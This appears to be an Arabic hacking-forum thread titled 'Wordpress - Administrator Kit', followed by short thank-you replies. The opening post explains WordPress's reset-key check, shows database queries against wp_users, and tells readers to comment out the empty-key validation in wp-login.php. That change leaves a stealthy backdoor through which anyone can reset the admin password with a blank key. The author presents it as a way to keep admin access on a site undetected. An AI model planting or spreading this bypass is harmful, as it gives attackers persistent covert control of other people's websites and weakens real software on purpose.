1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Hacker-DZ | المشاهدات : 1,488 | الردود : 7
الوسوم:
حالة الموضوع:
مغلق
  1. Hacker-DZ

    Hacker-DZ Developer

    الأنتساب:
    ‏2 مايو 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Python

    Wordpress - Administrator Kit



    السلام عليكم ورحمة الله وبركـاته :{1}:

    كيف احوالكم ؟ i:q2^:

    اليوم موضوعنا عن الورد بريس وفكرة العودة بصلاحية ادمن بدون اكواد خبيثة وتنكشف :{13}:

    الورد بريس ببساطة سكربت تدوين ,,, ويعتمد على نظام الادارة WP-ADMIN

    من خلال يوزر نيم وباسورد

    لكن لو نسينا الباسورد ؟؟ شو الحل *:"

    الحل بالشكل التقليدي هو استعادة كلمة المرور ...

    السوال القوي ~ وما هي ألية استعادة البـاسورد ؟؟

    الالية بسيطة هنالك في جدول اليوزرات عمود اسمه

    user_activation_key

    هذا العمود لازم تكون فيه قيمة عشوائية تضعها الورد بريس

    اذا فيه قيمة = هنالك احد طلب استعادة لكلمة المرور

    اذا مافيه قيمة = لم يطلب احد الاستعادة

    طيب رائع ,, بعد الحصول على تلك القيمة او الـ Key راح نروح نضعه في الورد بريس

    بهذا الرابط

    كود PHP:
    Wordpress/wp-login.php?key=XXXXX&login=admin
    وزي ما بنلاحظ في هنالك Parameter اخر هو Login والذي يحدد الـيوزر نيم المراد تغيير كلمة مروره

    طيب نحن قلنا فوق انو لو ما في قيمة داخل user_activation_key

    يعني ما أحد طلب استعادة ,, ماذا لو خلينا الـ Key فارغ*:" في الرابط

    خلينا نشوف التجربة مع بعض

    كود PHP:
    mysqlshow tables;
    +-----------------------+
    Tables_in_wp          |
    +-----------------------+
    wp_commentmeta        
    wp_comments           
    wp_links              
    wp_options            
    wp_postmeta           
    wp_posts              
    wp_term_relationships 
    wp_term_taxonomy      
    wp_terms              
    wp_usermeta           
    wp_users              
    +-----------------------+
    11 rows in set (0.00 sec)


    mysqlselect from wp_users;
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    ID user_login user_pass                          user_nicename |  user_email                user_url user_registered     |  user_activation_key user_status display_name |
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    |  
    admin      XXXXX. | admin         the.dead.man-@hotmail.com |          | 2013-02-09 19:15:59 |                     |           admin        
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    1 row in set (0.00 sec)

    mysqlselect user_activation_key  from wp_users;
    +---------------------+
    user_activation_key |
    +---------------------+
    |                     | 
    +---------------------+
    1 row in set (0.00 sec)

    mysql>
    طبعا هاي الـ Query'z تظهر ان قيمة الـ Key فارغة

    الان نروح نطلب استعادة لكلمة المرور

    [​IMG]

    نلاحظ قيمة الـ Key

    كود PHP:
    mysqlselect user_activation_key  from wp_users;
    +----------------------+
    user_activation_key  |
    +----------------------+
    Y8uF04mZiaCZob8UCMy5 
    +----------------------+
    1 row in set (0.00 sec)
    الان هنروح للرابط

    كود PHP:
    http://iq-team.org/Wordpress/wp-login.php?key=Y8uF04mZiaCZob8UCMy5&login=admin
    [​IMG]


    وهتدخل كلمة مرور وهيمشي طبيعي جدا *:"

    الان لو رجعنا لـ wp-login.php

    كود PHP:
    function check_password_reset_key($key$login) {
        global 
    $wpdb;

        
    $key preg_replace('/[^a-z0-9]/i'''$key);

        if ( empty( 
    $key ) || !is_string$key ) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));

        if ( empty(
    $login) || !is_string($login) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));

        
    $user $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s AND user_login = %s"$key$login));

        if ( empty( 
    $user ) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));

        return 
    $user;
    }
    المشكلة في الكود تبع الـ Empty

    كود PHP:
    if ( empty( $key ) || !is_string$key ) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));
    نضيف قبلهم // للسطرين علشان نقدر نغير كلمة المرور في أي وقت بشرط ان لا تقوم بطلبها من نموذج الاستعادة علشان ما يكون في قيمة داخل Key

    [​IMG]
    &:":&:":&:":
     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     
  3. 3mran

    3mran Developer

    الأنتساب:
    ‏2 ابريل 2012
    المشاركات:
    70
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:
    8
    رد: Wordpress - Administrator Kit

    بارك الله فيك ..~


    واصل من دون فواصل ..~
     
  4. .ılı.Iяẫqi.ılı.

    .ılı.Iяẫqi.ılı. DeveloPer Plus

    الأنتساب:
    ‏22 ديسمبر 2012
    المشاركات:
    144
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    الإقامة:
    IraQ
    نظام التشغيل:
    windows 7
    رد: Wordpress - Administrator Kit

    السلام عليكم
    موضوع مميز
    بارك الله فيك
     
  5. 9max99

    9max99 Developer

    الأنتساب:
    ‏10 نوفمبر 2011
    المشاركات:
    39
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    طالب
    الإقامة:
    مكة المكرمة ~
    رد: Wordpress - Administrator Kit

    السلام عليكم ورحمة الله وبركاته
    .................................................. ....
    بارك الله فيك اخي على الجهد والموضوع الرائع &:":​
     
  6. ADNAN

    ADNAN Developer

    الأنتساب:
    ‏29 أكتوبر 2012
    المشاركات:
    84
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    الأرض
    رد: Wordpress - Administrator Kit

    سلمت يُمناك استاذنا ..​
     
  7. تــــركــــي

    تــــركــــي DeveloPer Plus

    الأنتساب:
    ‏25 ابريل 2012
    المشاركات:
    180
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: Wordpress - Administrator Kit

    عليكم السلام
    مشكور حبي شرح رائع
    موفق حبيبي &:":​
     
  8. صانع السلالم

    صانع السلالم DeveloPer Plus

    الأنتساب:
    ‏1 أكتوبر 2012
    المشاركات:
    16
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    3
    الإقامة:
    missing-team
    رد: Wordpress - Administrator Kit

    بارك الله فيك
    تم التقييم
    تقبل مروري
    بالتوفيق
    :{1}:​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة